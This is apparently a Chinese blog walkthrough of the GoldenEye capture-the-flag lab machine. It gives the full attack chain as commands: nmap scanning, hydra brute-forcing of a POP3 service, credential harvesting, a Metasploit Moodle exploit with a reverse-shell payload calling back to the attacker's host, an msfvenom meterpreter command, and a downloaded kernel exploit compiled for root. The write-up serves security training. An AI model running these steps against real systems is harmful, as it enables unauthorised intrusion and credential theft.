1、配置网络
·VMWare的“虚拟网络编辑器”设置“NAT模式”
·虚拟机给的是“仅主机模式”,需要更改为NAT模式
·查看虚拟机MAC位置:“虚拟机”->“设置”->“网络适配器”->“高级”->mac位置(局域网检测目的ip是不是找正确)
2、渗透
1、探测ip
·netdiscover -r 192.168.153.0/24
·找到目的ip:192.168.153.135
2、探测端口
·nmap -sS -sV -T5 -A 192.168.153.135
·发掘开放80,25端口
·探测所有端口:nmap -p 0-65535 192.168.153.135
3、探测80端口网站并利用探测到的信息
·能够看到提示了目的目录:/sev-home/
·扫描目录(没找到什么有用的)
·查看页面源码(触及到的css和js文件都点开瞧瞧)
·得到下列内容
Boris, make sure you update your default password.
My sources say MI6 maybe planning to infiltrate.
Be on the lookout for any suspicious network traffic....
I encoded you p@ssword below...
InvincibleHack3r
BTW Natalya says she can break your codes
(密文自动被公众号解析了)
·得到用户Boris,Natalya
Boris,保证你更新了默认秘码。
我的信息源自说军情六处可能计划渗透。
警觉任何可疑的网络流量。。。。
我在下面给你编码了p@sword。。。
InvincibleHack3r(html解码)
顺便说一句,Natalya说她能够破解你的秘码
·因此得到账户:Boris(boris),InvincibleHack3r(invincibleHack3r)
·测试得到正确账户:boris,InvincibleHack3r
·拜访目录并登录
·得到内容:
GOLDENEYE
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.153.129 LPORT=4444 -f exe -o new.exe -i 5
·翻译
金眼
GoldenEye是一个绝密的苏联定向武器项目。因为您有拜访权限,您肯定持有绝密许可,有资格作为认证的GoldenEye网络运营商(GNO)
请发送电子邮件给合格的GNO主管,以接受在线GoldenEye操作员培训,作为GoldenEye系统的管理员
记住,因为隐式安全非常有效,咱们已将pop3服务配置为在非常高的非默认端口上运行
msfvenom-p窗口/仪表指针_反向tcp LHOST=192.168.153.129 LPORT=4444-f exe-o new.exe-i 5
·得知有pop3服务,按照前面的提示:有默认秘码,尝试暴力破解
hydra -L [可能的用户名txt] -P /usr/share/wordlists/fasttrack.txt 192.168.153.135 -s 55007 pop3 -vV (//-L文本 -l 是用户名 - p秘码 -vV 会表示每一条线程)
·爆破得到用户:boris/secret1,Boris/secret1!,natalya/bird,Natalya/bird
·登录查看pop3信箱
list能够列举数量
retr 1 //看第1封
·账户:boris/secret1
Boris, this is admin. You can electronically communicate to co-workers and students here. Im not going to scan emails for security risks because I trust you and the other admins here.
·账户:Boris/secret1!
·账户:natalya/bird
·第1封邮件: 娜塔莉亚,请你停止破解鲍里斯的秘码。另外,您是 GNO 培训主管。一旦学生被指定给你,我就会给你发电子邮 件。 另外,请重视可能的网络漏洞。咱们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。·账户:Natalya/bird
·第二封邮件:好的,Natalyn 我有一个新学生给你。因为这是一个新系统,倘若您看到任何配置问题,请告诉我或boris,尤其是它与安全相关的问题……即使不是,亦只需以“安全”为幌子输入……它就会 容易升级变更简单 好的,用户信用是:用户名:xenia 秘码:RCP90rulez!鲍里斯验证了她是一个有效的承包商,因此只需创建帐户好吗?倘若您无外边内部域的 URL:severnaya-station.com/gnocertdir **请务必编辑您的主机文件,由于您一般在远程离线工作.... 因为您是 Linux 用户,因此呢只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
·在第二封邮件看到了一个用户名秘码,此服务器域名和网站,还需求咱们在本地服务hosts中添加域名信息
用户名:xenia
秘码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
·添加hosts信息
·ctrl+O保留、ctrl+X退出编辑
·写入成功
·拜访url:severnaya-station.com/gnocertdir,找到登录页面
·输入用户信息,而后进入,得到一个用户
·这儿的意思是:有一个用户,说不要再这儿发信息,要去发邮件。说明这是一个邮件用户
·爆破doak和Doak用户秘码:
hydra -L doak -P /usr/share/wordlists/fasttrack.txt 192.168.153.135 -s 55007 pop3 -vV
·爆破出来秘码:doak,goat,查看邮件
·得到一个新用户:dr_doak,4England!
·运用新用户再次登录CMS
·得到一个路径:/dir007key/for-007.jpg(以及暗示管理员admin)
·下载照片后,照片属性存在
·eFdpbnRlcjE5OTV4IQ== ,经过base64解码:xWinter1995x!(应该是admin秘码)
·运用admin登录CMS
·发掘有2.2.3,况且运用了研发模块Moodle(用插件看(然则无版本号)或在首页最下面有框架信息)
3、getshell
·搜索框架对应的exp
·运用远程代码执行(RCE)漏洞利用
1、msfconsole ---进入MSF框架攻击界面
2、search moodle ---查询 moodle类型攻击的模块
3、use 1 ---调用1 exploit/multi/http/moodle_cmd_exec调用攻击脚 本
4、set username admin ---设置用户名:admin
5、set password xWinter1995x! ---设置秘码:xWinter1995x!
6、set rhostssevernaya-station.com ---设置:rhosts severnaya-station.com
7、set targeturi /gnocertdir ---设置目录: /gnocertdir
8、set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
9、set lhost 192.168.153.142 ---设置:lhost 192.168.153.142(通常便是自己的主机)
10、exploit ----执行命令(或run)
·这个exp默认运用4444端口(能够用options查看一下payload)
·因为运用的是powershell命令,因此修改(搜索查到的这儿又利用点)
·再次执行
·拿到shell
4、提权
·uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
·能够内核提权
·searchsploit 3.13.0#搜索exp(亦能够搜索ubuntu?能够试试)
·cd /usr/share/exploitdb/exploits/linux/local
·cp 37292.c /root/桌面/ #复制exp
·编辑37292.c(由于目的靶机无gcc环境,能够运用cc编译)(行数表示:ESC后,输入“:set number”)
·开启http服务,目的靶机下载代码(目的靶机能够先到/tmp目录再下载)
cc -o exp 37292.c ---C语言的CC代码编译点c文件
chmod +x exp ---添加执行权限
./exp ---点杠执行
id ---查看日前权限
·发掘权限变成root
这个靶机能够在github上找,倘若没找到私信我
|